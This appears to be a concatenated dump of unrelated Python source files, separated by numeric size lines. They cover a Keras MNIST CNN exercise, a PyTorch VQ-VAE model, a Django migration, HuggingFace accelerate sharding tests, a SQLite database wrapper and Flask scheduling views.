from .plot import PlotPhotometryHandler, PlotSpectroscopyHandler
from .token import TokenHandler
from .dbinfo import DBInfoHandler
from .profile import ProfileHandler
from .source_views import SourceViewsHandler
from .instrument_observation_params import InstrumentObservationParamsHandler
| 290 | 71 |
from __future__ import print_function
import tensorflow as tf
import keras
from keras.datasets import mnist
from keras.models import Sequential,model_from_json
from keras.layers import Dense, Dropout
from keras.optimizers import RMSprop
import numpy as np
def save_model(model,filename):
model_json = model.to_json()
with open(filename+".json", "w") as json_file:
json_file.write(model_json)
# serialize weights to HDF5
model.save_weights(filename+".h5")
print("Saved model to disk in files:", filename)
def load_model(filename):
# load json and create model
json_file = open(filename+".json", 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
# load weights into new model
loaded_model.load_weights(filename +".h5")
print("Loaded model from disk")
#### EXERCICE 3
(x_train,y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(x_train.shape[0], x_train.shape[1], x_train.shape[2], 1)
x_test = x_test.reshape(x_test.shape[0], x_test.shape[1], x_test.shape[2], 1)
x_train = x_train.astype('float32')
y_train = y_train.astype('float32') #y: verite terrain
x_test = x_test.astype('float32')
y_test = y_test.astype('float32')
x_train = x_train/ 255 #niveau de gris entre 0 et 255 (regionde 28*28*1)
x_test = x_test/255
''' One hot encoding:
transposition en vecteur de taille 10
Valeur 6-> |0|0|0|0|0|0|1|0|0|0|
Valeur 2-> |0|0|1|0|0|0|0|0|0|0|
Valeur 9-> |0|0|1|0|0|0|0|0|0|1|
Fonction de perte (loss):L(
'''
y_train = keras.utils.to_categorical(y_train)
y_test = keras.utils.to_categorical(y_test)
filename_from_model="test"
# load_model(filename_from_model)
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D, Flatten, Dense
def cnn1():
cnn_model = Sequential()
cnn_model.add(
keras.layers.Conv2D(64,
kernel_size=(3,3),
activation='relu',
input_shape=(28,28,1)
)
)
cnn_model.add(keras.layers.MaxPooling2D(pool_size=(2,2)))
cnn_model.add(Flatten())
cnn_model.add(Dense(10, activation='relu', kernel_initializer='normal')) #param1=nb neuronne, param2=activation
numClasses=10
cnn_model.add(Dense(numClasses, activation='softmax', kernel_initializer='normal')) #param1=nb neuronne, param2=activation
cnn_model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])
return cnn_model
epochs=10 #nombre d epoques
batch_size=64
cnn = cnn1()
cnn.summary()
cnn.fit(x_train, y_train, validation_data=(x_test,y_test), epochs=epochs, batch_size=batch_size)
save_model(cnn, filename_from_model)
#possibilite de save un model pour le sauvegarder et eviter de repartir de 0
| 2,854 | 1,117 |
import sys
import torch
from torch import nn
from torch.nn import functional as F
# sys.path.append('../')
#
# from image.vqvae import Quantize
# Copyright 2018 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Borrowed from https://github.com/deepmind/sonnet and ported it to PyTorch
class Quantize(nn.Module):
def __init__(self, dim, n_embed, decay=0.99, eps=1e-5, qw=10):
super().__init__()
self.qw = qw
self.dim = dim
self.n_embed = n_embed
self.decay = decay
self.eps = eps
embed = torch.randn(dim, n_embed)
self.register_buffer('embed', embed)
self.register_buffer('cluster_size', torch.zeros(n_embed))
self.register_buffer('embed_avg', embed.clone())
def forward(self, input):
flatten = input.reshape(-1, self.dim)
# print('flatten input {}'.format(flatten.shape))
# print('quantize embed {}'.format(self.embed))
dist = (
flatten.pow(2).sum(1, keepdim=True)
- 2 * flatten @ self.embed
+ self.embed.pow(2).sum(0, keepdim=True)
)
# print('quantize dist {}'.format(dist.shape))
_, embed_ind = (-dist).max(1)
# print('quantize embed_ind {}'.format(embed_ind.shape))
embed_onehot = F.one_hot(embed_ind, self.n_embed).type(flatten.dtype)
embed_ind = embed_ind.view(*input.shape[:-1])
quantize = self.embed_code(embed_ind)
if self.training:
self.cluster_size.data.mul_(self.decay).add_(
1 - self.decay, embed_onehot.sum(0)
)
embed_sum = flatten.transpose(0, 1) @ embed_onehot
self.embed_avg.data.mul_(self.decay).add_(1 - self.decay, embed_sum)
n = self.cluster_size.sum()
cluster_size = (
(self.cluster_size + self.eps) / (n + self.n_embed * self.eps) * n
)
embed_normalized = self.embed_avg / cluster_size.unsqueeze(0)
self.embed.data.copy_(embed_normalized)
norm = input.detach().pow(2).mean() + self.qw * quantize.detach().pow(2).mean()
# print(norm)
diff = ((quantize.detach() - input).pow(2).mean()) / norm
quantize = input + (quantize - input).detach()
# print('quantize quantize {}'.format(quantize.shape))
return quantize, diff, embed_ind
def embed_code(self, embed_id):
return F.embedding(embed_id, self.embed.transpose(0, 1))
class ResBlock(nn.Module):
def __init__(self, in_channel, channel):
super().__init__()
self.conv = nn.Sequential(
nn.ReLU(inplace=True),
nn.Conv2d(in_channel, channel, 3, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(channel, in_channel, 1),
)
def forward(self, input):
out = self.conv(input)
out += input
return out
class Encoder(nn.Module):
def __init__(self, in_channel, channel, n_res_block, n_res_channel, stride):
super().__init__()
if stride == 8:
blocks = [
nn.Conv2d(in_channel, channel // 2, 4, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(channel // 2, channel, 4, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(channel, channel, 3, padding=1),
nn.Conv2d(in_channel, channel // 2, 4, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(channel // 2, channel, 3, padding=1),
]
elif stride == 4:
blocks = [
nn.Conv2d(in_channel, channel // 2, 4, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(channel // 2, channel, 4, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(channel, channel, 3, padding=1),
]
elif stride == 2:
blocks = [
nn.Conv2d(in_channel, channel // 2, 4, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(channel // 2, channel, 3, padding=1),
]
for i in range(n_res_block):
blocks.append(ResBlock(channel, n_res_channel))
blocks.append(nn.ReLU(inplace=True))
self.blocks = nn.Sequential(*blocks)
def forward(self, input):
return self.blocks(input)
class Decoder(nn.Module):
def __init__(
self, in_channel, out_channel, channel, n_res_block, n_res_channel, stride
):
super().__init__()
blocks = [nn.Conv2d(in_channel, channel, 3, padding=1)]
for i in range(n_res_block):
blocks.append(ResBlock(channel, n_res_channel))
blocks.append(nn.ReLU(inplace=True))
if stride == 8:
blocks.extend(
[
nn.ConvTranspose2d(channel, channel // 2, 4, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(
channel // 2, out_channel, 4, stride=2, padding=1
),
nn.ConvTranspose2d(channel, out_channel, 4, stride=2, padding=1),
]
)
elif stride == 4:
blocks.extend(
[
nn.ConvTranspose2d(channel, channel // 2, 4, stride=2, padding=1),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(
channel // 2, out_channel, 4, stride=2, padding=1
),
]
)
elif stride == 2:
blocks.append(
nn.ConvTranspose2d(channel, out_channel, 4, stride=2, padding=1)
)
self.blocks = nn.Sequential(*blocks)
def forward(self, input):
return self.blocks(input)
class VQVAE_ML(nn.Module):
def __init__(
self,
in_channel=3,
channel=64,
n_res_block=2,
n_res_channel=16,
embed_dim=16,
n_level=4,
n_embed = 16,
decay=0.80,
stride=4,
):
super().__init__()
self.device = 'cuda'
self.enc = Encoder(in_channel, channel, n_res_block, n_res_channel, stride=stride)
self.enc_t = Encoder(channel, channel, n_res_block, n_res_channel, stride=2)
self.quantize_conv = nn.Conv2d(channel, embed_dim, 1)
self.n_level = n_level
self.quantizes = nn.ModuleList()
self.quantizes_conv = nn.ModuleList()
self.bns = nn.ModuleList()
for i in range(n_level):
self.quantizes.append(Quantize(embed_dim, n_embed,decay))
self.quantizes_conv.append(nn.Conv2d(embed_dim, embed_dim, 1))
self.bns.append(nn.BatchNorm2d(embed_dim))
self.dec_t = Decoder(
embed_dim, embed_dim, channel, n_res_block, n_res_channel, stride=2
)
# self.quantize_conv_b = nn.Conv2d(embed_dim + channel, embed_dim, 1)
# self.quantize_b = Quantize(embed_dim, n_embed)
# self.upsample_t = nn.ConvTranspose2d(
# embed_dim, embed_dim, 4, stride=2, padding=1
# )
self.dec = Decoder(
embed_dim ,
in_channel,
channel,
n_res_block,
n_res_channel,
stride=stride,
)
def forward(self, input):
quant, diff, _,_ = self.encode(input)
# print('quant shape {}'.format(quant.shape))
dec = self.decode(quant)
return dec, diff
def encode(self, input):
enc = self.enc(input)
enc = self.enc_t(enc)
bottleneck = self.quantize_conv(enc)
ids = None
quants = None
diffs = None
quant_sum = None
total_quantize = len(self.quantizes)
for i,quantize in enumerate(self.quantizes):
quant, diff, id = quantize(bottleneck.permute(0, 2, 3, 1))
quant = quant.permute(0, 3, 1, 2)
diff = diff.unsqueeze(0)
if diffs is None:
# diffs = total_quantize * diff
diffs = diff
quant_sum = quant
quants = quant.unsqueeze(1)
ids = id.unsqueeze(1)
else:
# diffs += (total_quantize - i) * diff
diffs += diff
quant_sum += quant
quants = torch.cat((quants,quant.unsqueeze(1)),dim=1)
ids = torch.cat((ids, id.unsqueeze(1)), dim=1)
bottleneck -= quant
# bottleneck = F.relu(self.bns[i](self.quantizes_conv[i](bottleneck)))
return quant_sum, diffs, quants, ids
def decode(self, quant):
dec = self.dec_t(quant)
return self.dec(dec)
def decode_code(self, codes):
quants = None
for i, code in enumerate(codes):
quant = self.quantizes.embed_code(code)
quant = quant.permute(0, 3, 1, 2)
quants += quant
dec = self.decode(quants)
return dec
| 9,733 | 3,250 |
# Generated by Django 3.1.3 on 2020-12-09 13:40
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('patients', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Report',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('used_techniques', models.CharField(max_length=200)),
('conclusions', models.CharField(max_length=200)),
('patient', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='id_patient', to='patients.patient')),
],
),
]
| 848 | 267 |
# Copyright 2021 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
import unittest
from torch.utils.data import BatchSampler, IterableDataset
from accelerate.data_loader import BatchSamplerShard, IterableDatasetShard
class RandomIterableDataset(IterableDataset):
# For testing, an iterable dataset of random length
def __init__(self, p_stop=0.01, max_length=1000):
self.p_stop = p_stop
self.max_length = max_length
def __iter__(self):
count = 0
stop = False
while not stop and count < self.max_length:
yield count
count += 1
stop = random.random() < self.p_stop
class DataLoaderTester(unittest.TestCase):
def check_batch_sampler_shards(self, batch_sampler, expected, split_batches=False):
batch_sampler_shards = [BatchSamplerShard(batch_sampler, 2, i, split_batches) for i in range(2)]
batch_sampler_lists = [list(batch_sampler_shard) for batch_sampler_shard in batch_sampler_shards]
if not split_batches:
self.assertListEqual([len(shard) for shard in batch_sampler_shards], [len(e) for e in expected])
self.assertListEqual(batch_sampler_lists, expected)
def test_batch_sampler_shards_with_no_splits(self):
# Check the shards when the dataset is a round multiple of total batch size.
batch_sampler = BatchSampler(range(24), batch_size=3, drop_last=False)
expected = [
[[0, 1, 2], [6, 7, 8], [12, 13, 14], [18, 19, 20]],
[[3, 4, 5], [9, 10, 11], [15, 16, 17], [21, 22, 23]],
]
self.check_batch_sampler_shards(batch_sampler, expected)
batch_sampler = BatchSampler(range(24), batch_size=3, drop_last=True)
# Expected shouldn't change
self.check_batch_sampler_shards(batch_sampler, expected)
# Check the shards when the dataset is a round multiple of batch size but not total batch size.
batch_sampler = BatchSampler(range(21), batch_size=3, drop_last=False)
expected = [
[[0, 1, 2], [6, 7, 8], [12, 13, 14], [18, 19, 20]],
[[3, 4, 5], [9, 10, 11], [15, 16, 17], [0, 1, 2]],
]
self.check_batch_sampler_shards(batch_sampler, expected)
batch_sampler = BatchSampler(range(21), batch_size=3, drop_last=True)
expected = [
[[0, 1, 2], [6, 7, 8], [12, 13, 14]],
[[3, 4, 5], [9, 10, 11], [15, 16, 17]],
]
self.check_batch_sampler_shards(batch_sampler, expected)
# Check the shards when the dataset is not a round multiple of batch size but has a multiple of
# num_processes batch.
batch_sampler = BatchSampler(range(22), batch_size=3, drop_last=False)
expected = [
[[0, 1, 2], [6, 7, 8], [12, 13, 14], [18, 19, 20]],
[[3, 4, 5], [9, 10, 11], [15, 16, 17], [21, 0, 1]],
]
self.check_batch_sampler_shards(batch_sampler, expected)
batch_sampler = BatchSampler(range(22), batch_size=3, drop_last=True)
expected = [
[[0, 1, 2], [6, 7, 8], [12, 13, 14]],
[[3, 4, 5], [9, 10, 11], [15, 16, 17]],
]
self.check_batch_sampler_shards(batch_sampler, expected)
# Check the shards when the dataset is not a round multiple of batch size but and has not a multiple of
# num_processes batch.
batch_sampler = BatchSampler(range(20), batch_size=3, drop_last=False)
expected = [
[[0, 1, 2], [6, 7, 8], [12, 13, 14], [18, 19, 0]],
[[3, 4, 5], [9, 10, 11], [15, 16, 17], [1, 2, 3]],
]
self.check_batch_sampler_shards(batch_sampler, expected)
batch_sampler = BatchSampler(range(20), batch_size=3, drop_last=True)
expected = [
[[0, 1, 2], [6, 7, 8], [12, 13, 14]],
[[3, 4, 5], [9, 10, 11], [15, 16, 17]],
]
self.check_batch_sampler_shards(batch_sampler, expected)
# Check the shards when the dataset is very small.
batch_sampler = BatchSampler(range(2), batch_size=3, drop_last=False)
expected = [[[0, 1, 0]], [[1, 0, 1]]]
self.check_batch_sampler_shards(batch_sampler, expected)
batch_sampler = BatchSampler(range(2), batch_size=3, drop_last=True)
expected = [[], []]
self.check_batch_sampler_shards(batch_sampler, expected)
def test_batch_sampler_shards_with_splits(self):
# Check the shards when the dataset is a round multiple of batch size.
batch_sampler = BatchSampler(range(24), batch_size=4, drop_last=False)
expected = [
[[0, 1], [4, 5], [8, 9], [12, 13], [16, 17], [20, 21]],
[[2, 3], [6, 7], [10, 11], [14, 15], [18, 19], [22, 23]],
]
self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
batch_sampler = BatchSampler(range(24), batch_size=4, drop_last=True)
# Expected shouldn't change
self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
# Check the shards when the dataset is not a round multiple of batch size.
batch_sampler = BatchSampler(range(22), batch_size=4, drop_last=False)
expected = [
[[0, 1], [4, 5], [8, 9], [12, 13], [16, 17], [20, 21]],
[[2, 3], [6, 7], [10, 11], [14, 15], [18, 19], [0, 1]],
]
self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
batch_sampler = BatchSampler(range(22), batch_size=4, drop_last=True)
expected = [
[[0, 1], [4, 5], [8, 9], [12, 13], [16, 17]],
[[2, 3], [6, 7], [10, 11], [14, 15], [18, 19]],
]
self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
# Check the shards when the dataset is not a round multiple of batch size or num_processes.
batch_sampler = BatchSampler(range(21), batch_size=4, drop_last=False)
expected = [
[[0, 1], [4, 5], [8, 9], [12, 13], [16, 17], [20, 0]],
[[2, 3], [6, 7], [10, 11], [14, 15], [18, 19], [1, 2]],
]
self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
batch_sampler = BatchSampler(range(21), batch_size=4, drop_last=True)
expected = [
[[0, 1], [4, 5], [8, 9], [12, 13], [16, 17]],
[[2, 3], [6, 7], [10, 11], [14, 15], [18, 19]],
]
self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
# Check the shards when the dataset is very small.
batch_sampler = BatchSampler(range(2), batch_size=4, drop_last=False)
expected = [[[0, 1]], [[0, 1]]]
self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
batch_sampler = BatchSampler(range(2), batch_size=4, drop_last=True)
expected = [[], []]
self.check_batch_sampler_shards(batch_sampler, expected, split_batches=True)
def check_iterable_dataset_shards(
self, dataset, seed, batch_size, drop_last=False, num_processes=2, split_batches=False
):
random.seed(seed)
reference = list(dataset)
iterable_dataset_shards = [
IterableDatasetShard(
dataset,
batch_size=batch_size,
drop_last=drop_last,
num_processes=num_processes,
process_index=i,
split_batches=split_batches,
)
for i in range(num_processes)
]
iterable_dataset_lists = []
for iterable_dataset_shard in iterable_dataset_shards:
# Since our random iterable dataset will be... random... we need to use a seed to get reproducible results.
random.seed(seed)
iterable_dataset_lists.append(list(iterable_dataset_shard))
shard_batch_size = batch_size // num_processes if split_batches else batch_size
# All iterable dataset shard should have the same length, a round multiple of shard_batch_size
first_list = iterable_dataset_lists[0]
for l in iterable_dataset_lists[1:]:
self.assertEqual(len(l), len(first_list))
self.assertTrue(len(l) % shard_batch_size == 0)
observed = []
for idx in range(0, len(first_list), shard_batch_size):
for l in iterable_dataset_lists:
observed += l[idx : idx + shard_batch_size]
if not drop_last:
while len(reference) < len(observed):
reference += reference
self.assertListEqual(observed, reference[: len(observed)])
def test_iterable_dataset_shard(self):
seed = 42
dataset = RandomIterableDataset()
self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=False, split_batches=False)
self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=True, split_batches=False)
self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=False, split_batches=True)
self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=True, split_batches=True)
# Edge case with a very small dataset
dataset = RandomIterableDataset(max_length=2)
self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=False, split_batches=False)
self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=True, split_batches=False)
self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=False, split_batches=True)
self.check_iterable_dataset_shards(dataset, seed, batch_size=4, drop_last=True, split_batches=True)
| 10,249 | 3,712 |
from .product import ProductForm
from .receipt import ReceiptForm
from .user import LoginForm, RegisterForm, EditUserForm | 121 | 30 |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
MOPA
An independet project
Método de Obtenção da Posição de Atirador
-------------------
begin : 2019-01-15
git sha : $Format:%H$
copyright : (C) 2018 by João P. Esperidião
email : joao.p2709@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import sqlite3, os
from PyQt5.QtCore import QObject
from Core.enums import Enums
from Core.DatabaseTools.SqlGenerator.sqlGeneratorFactory import SqlGeneratorFactory
class AbstractDatabase(QObject):
def __init__(self, parameters=None):
"""
Connects to a database and manages its contents.
:parameters: (dict) connection parameters.
"""
super(AbstractDatabase, self).__init__()
self.connect(parameters)
self.gen = self.sqlGenerator()
def driver(self):
"""
Gets current connection's driver.
:return: (int) driver code/enum.
"""
return Enums.NoDatabase
def driverName(self):
"""
Gets current connection's driver name.
"""
return "NoDriver"
def name(self):
"""
Gets current database's connection name.
:return: (str) database name.
"""
return ''
def query(self, sql, commit=False):
"""
Executes a query on loaded database.
:param sql: (str) SQL statement to be executed on the database.
:param commit: (bool) if any changes should be commited to database.
:return: (cursor?) cursor to query results.
"""
# to be reimplemented
pass
def validateConnectionParameters(self, parameters):
"""
Validates connection parameters before trying to connect it.
:parameters: (dict) connection parameters.
:return: (bool) parameters' validity status.
"""
# to be reimplemented
return False
def connect(self, parameters):
"""
Connects to a database and sets it to db attribute.
:parameters: (dict) connection parameters.
:return: () database object.
"""
# to be reimplemented
self.db = None
def isConnected(self):
"""
Checks if current database is connected to a valid source.
:return: (bool) validity status.
"""
# to be reimplemented
return self.db is not None
def createDatabase(self, parameters):
"""
Creates a database.
:return: (bool) creation status.
"""
# to be reimplemented
return False
def disconnect(self):
"""
Disconnects from a database, if connected to any.
"""
if self.db is not None:
self.db.close()
del self.db
self.db = None
def sqlGenerator(self):
"""
Gets a SQL generator object.
:return: (AbstractSqlGenerator) SQL generator.
"""
return SqlGeneratorFactory.getGenerator(self.driver())
def createObservations(self):
"""
Creates observations table.
:return: (bool) execution status.
"""
self.query(self.gen.createObservations(), commit=True)
return 'observation' in self.allTables()
def createSensors(self):
"""
Creates observations table.
:return: (bool) execution status.
"""
self.query(self.gen.createSensors(), commit=True)
return 'sensors' in self.allTables()
def allTables(self):
"""
Gets a list of all available tables.
:return: (list-of-str) list of names from available tables.
"""
if self.isConnected():
return [t[0] for t in self.query(self.gen.allTables())]
return []
def allObservations(self):
"""
A list of all observation's information present at the database.
:return: (list-of-tuple) observations' informations.
"""
if self.isConnected():
return self.query(self.gen.allObservations())
return []
def allSensors(self):
"""
A list of all sensor's information present at the database.
:return: (list-of-tuple) sensors' informations.
"""
if self.isConnected():
return self.query(self.gen.allSensors())
return []
def getSensor(self, sensorId):
"""
Gets a sensor using its ID.
:param sensorId: (int) sensor's ID.
:return: (tuple) sensor's informations, if it exists.
"""
if self.isConnected():
sensorL = self.query(self.gen.getSensor(sensorId))
return sensorL[0] if len(sensorL) > 0 else tuple()
return tuple()
def addObservation(self, azimuth, zenith, sensorId, commit=True):
"""
Adds a sensor to the database.
:param azimuth: observation's azimuth angle.
:param zenith: observation's zenith angle.
:param sensorId: (str) station's ID.
:param commit: (bool) commit addition to database.
"""
if self.isConnected():
return self.query(
self.gen.addObservation(azimuth, zenith, sensorId), commit
)
return
def addSensor(self, coordinates, epsg, name=None, status=True, commit=True):
"""
Gets a sensor using its ID.
:param coordinates: (tuple-of-float) sensor's coordinates.
:param epsg: (int) sensor's CRS auth id.
:param name: (str) station's friendly name.
:param status: (bool) working status.
:param commit: (bool) commit addition to database.
"""
if self.isConnected():
self.query(
self.gen.addSensor(coordinates, epsg, name, status), commit
)
return
def updateObservation(self, table, obs, commit=True):
"""
Updates observation's information. Observation information should already
exist into the database.
:param table: (str) observations' table name.
:param sensor: (Observation) observation object.
:param commit: (bool) commit addition to database.
"""
if self.isConnected():
self.query(
self.gen.updateObservation(
table=table, obsId=obs['id'], azimuth=obs['azimuth'],
zenith=obs['zenith'], sensorId=obs['sensorId'],
date=obs['date']
), commit
)
def updateSensor(self, table, sensor, commit=True):
"""
Updates sensors information. Sensor information should already exist into
the database.
:param table: (str) sensors' table name.
:param sensor: (Sensor) sensor object.
:param commit: (bool) commit addition to database.
"""
if self.isConnected():
coord = ",".join(map(str, sensor['coordinates']))
self.query(
self.gen.updateSensor(
table=table, epsg=sensor['epsg'], sensorId=sensor['id'],
coord=coord, onDate=sensor['activation_date'],
status=sensor['status'], name=sensor['name'],
offDate=sensor['deactivation_date']
), commit
)
def createShootersTable(self, tablename, commit=True):
"""
Creates the shooters' table. Method should be invoked from settings module.
:para tablename: (str) shooters' table name (default from settings).
:param commit: (bool) commit table creation to the database.
"""
if self.isConnected() and not self.tableExists(tablename):
self.query(self.gen.createShootersTable(tablename), commit)
return self.tableExists(tablename)
return False
def dropShootersTable(self, tablename, commit=True):
"""
Drops shooters' table. Method should be invoked from settings module.
:para tablename: (str) shooters' table name (default from settings).
:param commit: (bool) commit table creation to the database.
"""
if self.isConnected() and self.tableExists(tablename):
self.query(self.gen.dropTable(tablename), commit)
return not self.tableExists(tablename)
return False
def tableExists(self, tablename):
"""
Verifies if table exists into database.
:param tablename: (str) table's name.
:return: (bool) whether table exists.
"""
return tablename in self.allTables()
| 9,435 | 2,474 |
import calendar
import os
from datetime import datetime
from dateutil.parser import parse
# server side rendering related imports
from flask import render_template, url_for, flash, redirect, request, jsonify, send_from_directory
# login related imports
from flask_login import login_user, logout_user, login_required, current_user
# SQLAlchemy related imports
from sqlalchemy import extract, and_, func
# __init__.py imports
from scheduler import app, db, bcrypt
# Forms
from scheduler.forms import RegistrationForm, LoginForm, EmployeeForm, DepartmentForm, ForecastItemsForm, ProjectForm, \
AssignmentForm, FilterForm, AccountForm, SearchEmployeeForm, SearchAssignmentForm, \
SearchProjectsForm
from scheduler.models import ForecastItemSchema, ProjectSchema, EmployeesSchema
# DB Models
from scheduler.models import User, Department, Employee, Project, ForecastItem, AssignmentTypes
@app.route('/favicon.ico')
def favicon():
return send_from_directory(os.path.join(app.root_path, 'static'),
'favicon.ico', mimetype='image/vnd.microsoft.icon')
@app.route("/", methods=['GET', 'POST'])
@app.route("/home", methods=['GET', 'POST'])
@login_required
def home():
curr_user = current_user.id
form = FilterForm()
newTask = ForecastItemsForm()
cal = calendar.TextCalendar(calendar.SUNDAY)
days = []
selected_year = datetime.today().year
selected_month = datetime.today().month
timeObject = cal.monthdatescalendar(selected_year, selected_month)
for _time in timeObject:
for _date in _time:
if _date.month == selected_month:
days.append(_date.strftime('%m/%d/%Y'))
if current_user.role == 'Admin':
data = db.session.query(ForecastItem) \
.filter(extract('month', ForecastItem.start_date) == selected_month).all()
elif current_user.role == 'Editor':
data = db.session.query(ForecastItem) \
.filter(and_(extract('month', ForecastItem.start_date) == selected_month),
ForecastItem.user_id == curr_user).all()
else:
data = db.session.query(ForecastItem) \
.filter(and_(extract('month', ForecastItem.start_date) == selected_month),
ForecastItem.employee_id == current_user.employee_id).all()
if request.method == "POST" and form.validate_on_submit:
new_year = request.form["filter_by_year"]
new_month = request.form["filter_by_month"]
days = []
selected_year = int(new_year)
selected_month = datetime.strptime(new_month, '%B').month
timeObject = cal.monthdatescalendar(selected_year, selected_month)
for _time in timeObject:
for _date in _time:
if _date.month == selected_month:
days.append(_date.strftime('%m/%d/%Y'))
form.filter_by_year.data = new_year
form.filter_by_month.choices = [
item.start_date.strftime('%B') for item in
db.session.query(ForecastItem)
.distinct(func.to_char(ForecastItem.start_date, "FMMonth"))
.filter(extract('year', ForecastItem.start_date) == f'{new_year}')
]
data = db.session.query(ForecastItem).filter(
and_(extract('year', ForecastItem.start_date) == new_year,
extract('month', ForecastItem.start_date) == selected_month,
ForecastItem.user_id == curr_user)).all()
return render_template('home.html',
days=days,
data=data,
form=form,
newTask=newTask)
@app.route("/assignments", methods=['GET', 'POST'])
@login_required
def assignments():
form = ForecastItemsForm()
search_form = SearchAssignmentForm()
res = search_form.searchField.data
choice = search_form.searchBy.data
curr_user = current_user.id
if current_user.role == 'Admin':
data = ForecastItem.query.all()
elif current_user.role == 'Editor':
data = ForecastItem.query.filter(ForecastItem.user_id == curr_user)
else:
data = ForecastItem.query.filter(ForecastItem.employee_id == current_user.employee_id)
if res and search_form.validate_on_submit():
if choice == 'First Name':
data = ForecastItem.query.join(Employee) \
.filter(and_(ForecastItem.user_id == curr_user, Employee.first_name.like(f'%{res.capitalize()}%'))
).all()
elif choice == 'Last Name':
data = ForecastItem.query.join(Employee) \
.filter(and_(ForecastItem.user_id == curr_user, Employee.last_name.like(f'%{res.capitalize()}%'))
).all()
elif choice == 'Project Name':
data = ForecastItem.query.join(Project) \
.filter(and_(ForecastItem.user_id == curr_user, Project.project_name.like(f'%{res.capitalize()}%'))
).all()
elif choice == 'Project Number':
data = ForecastItem.query.join(Project) \
.filter(and_(ForecastItem.user_id == curr_user, Project.project_number == res)
).all()
else:
data = ForecastItem.query.filter(ForecastItem.user_id == curr_user).all()
return render_template('assignments.html',
title='Assignments',
form=form,
search_form=search_form,
data=data)
if form.validate_on_submit():
forecast_item = ForecastItem(
employee_id=form.employee.data,
user_id=current_user.id,
project_id=form.project.data,
assignment_id=form.assignment.data,
status=form.status.data,
description=form.description.data,
start_date=form.start_date.data,
end_date=form.end_date.data
)
db.session.add(forecast_item)
db.session.commit()
flash('Task has been added.', 'success')
return redirect(url_for('home'))
return render_template('assignments.html',
title='Assignments',
form=form,
search_form=search_form,
data=data)
@app.route("/assignments/<int:assignment_id>", methods=['GET', 'POST'])
@login_required
def assignment(assignment_id):
if current_user.role == 'Admin' or current_user.role == 'Editor':
data = ForecastItem.query.get_or_404(assignment_id)
form = ForecastItemsForm()
if form.validate_on_submit():
data.employee_id = form.employee.data
data.project_id = form.project.data
data.assignment_id = form.assignment.data
data.status = form.status.data
data.description = form.description.data
data.start_date = form.start_date.data
data.end_date = form.end_date.data
db.session.commit()
flash('Task has been updated!', 'success')
return redirect(url_for('assignments',
assignment_id=assignment_id))
elif request.method == 'GET':
form.employee.data = data.employee_id
form.project.data = data.project_id
form.assignment.data = data.assignment_id
form.status.data = data.status
form.description.data = data.description
form.start_date.data = data.start_date
form.end_date.data = data.end_date
return render_template('assignment.html',
title='Update Assignment',
data=data,
form=form)
else:
return redirect(url_for('home'))
@app.route("/assignments/<int:assignment_id>/delete", methods=['POST'])
@login_required
def delete_assignment(assignment_id):
if current_user.role == 'Admin' or current_user.role == 'Editor':
data = ForecastItem.query.get_or_404(assignment_id)
db.session.delete(data)
db.session.commit()
flash('Task has been deleted!.', 'success')
return redirect(url_for('assignments'))
else:
return redirect(url_for('home'))
@app.route("/assignments_report", methods=['GET', 'POST'])
@login_required
def assignments_report():
form = FilterForm()
if current_user.role == 'Admin':
data = ForecastItem.query.join(Employee).all()
elif current_user.role == 'Editor':
data = ForecastItem.query.filter(ForecastItem.user_id == current_user.id)
else:
data = ForecastItem.query.filter(ForecastItem.employee_id == current_user.employee_id)
return render_template('assignments_report.html', title='Assignments Report', data=data, form=form)
